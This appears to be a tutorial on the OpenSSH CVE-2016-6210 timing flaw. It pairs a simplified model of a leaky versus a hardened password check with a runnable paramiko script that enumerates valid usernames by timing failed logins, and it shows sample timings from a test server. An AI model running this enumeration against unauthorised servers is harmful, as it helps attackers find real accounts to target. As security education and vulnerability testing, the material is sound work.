Listing users via the CVE-2016-6210 vulnerability

So when OpenSSH checks a user’s password, it will use a hashing function like SHA256 / SHA512 to hash the password and check it against the user’s saved hashed password.

However, OpenSSH 7.2p2 and before had a vulnerability where it would use Blowfish for users that don't exist, and SHA256 / SHA512 for real users. The two hashes run at different speeds, so it's easy to tell a real user from a fake one by timing the response. The bug report has some further details on it.

If SELinux is enabled, OpenSSH will use the helper binary “unix_chkpwd” which mitigates this flaw.
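To show why the hash mismatch matters, here is an added, simplified model of the check (example code, not OpenSSH's own): PBKDF2-SHA512 stands in for the slow SHA256/SHA512 crypt() path, a single SHA-256 stands in for the cheaper mismatched path taken for unknown users, and the user database and passwords are constructed. The hardened variant runs the same hash against a dummy record for unknown users, so both paths cost the same.

```python
import hashlib
import hmac
import os

# Constructed user database; PBKDF2-SHA512 stands in for the slow crypt()
# path (SHA-256/512) that a real user's password takes in OpenSSH.
ITERATIONS = 100_000
WORK = {"slow_hashes": 0}


def slow_hash(password, salt):
    WORK["slow_hashes"] += 1
    return hashlib.pbkdf2_hmac("sha512", password.encode(), salt, ITERATIONS)


def make_user(password):
    salt = os.urandom(16)
    return salt, slow_hash(password, salt)


USERS = {"realuser": make_user("correct horse")}

# Dummy record hashed once at startup; unknown users are checked against it.
DUMMY_SALT, DUMMY_HASH = make_user("unused dummy password")


def check_vulnerable(user, password):
    """Leaky: an unknown user goes through a different, cheap hash
    (one round of SHA-256 here, standing in for the Blowfish mismatch),
    so the time taken to reject reveals whether the account exists."""
    if user not in USERS:
        fake = hashlib.sha256(password.encode()).digest()
        return hmac.compare_digest(fake, bytes(32))  # always False
    salt, stored = USERS[user]
    return hmac.compare_digest(slow_hash(password, salt), stored)


def check_hardened(user, password):
    """Same work on both paths: unknown users are hashed against the dummy
    record with the same algorithm, then rejected regardless."""
    salt, stored = USERS.get(user, (DUMMY_SALT, DUMMY_HASH))
    ok = hmac.compare_digest(slow_hash(password, salt), stored)
    return ok and user in USERS


def slow_hashes_used(check, user, password):
    """Count how many slow hash computations one login attempt triggers."""
    before = WORK["slow_hashes"]
    check(user, password)
    return WORK["slow_hashes"] - before
```

Counting slow hashes rather than wall-clock time keeps the demonstration deterministic; the vulnerable check does zero slow hashes for an unknown user and one for a real one, while the hardened check does one in both cases.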

Test Script

Here is a Python script from this article. Setting the <SET SERVER HERE> placeholder to whatever server we want to test, we can see if the server is vulnerable:

import paramiko
import time

user = input("user: ")
# A very long password makes the hashing cost, and so the timing gap, measurable
p = 'A' * 25000

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

starttime = time.time()
try:
    ssh.connect('<SET SERVER HERE>', username=user, password=p)
except Exception:
    # Authentication is expected to fail; only the elapsed time matters
    pass
finally:
    # Record the end time whether or not connect() raised
    endtime = time.time()
    ssh.close()

total = endtime - starttime
print(total)

Testing it

So, first let's test a remote server of mine that I set up just for this. I change the above '<SET SERVER HERE>' to my server's address, say '10.1.1.5', and save it.

Let's test a real user (you can also use root as the user, if it's enabled):

user: realuser
12.5089271069

Then let’s test a fake one:

user: iambatman
2.69300603867

As you can see, 12.5 is greater than 2.6, so yes, the server is vulnerable.

In other cases, this can be done on a local system.

Fake user:

nothere
0.0369758605957

Real user:

MrReal
0.0134921073914

As you can see, the times are still different, but the real one is less than the fake one. I’m guessing this is due to SHA256/512 being faster than Blowfish, and the checker not adding any wait time as it’s a local connection.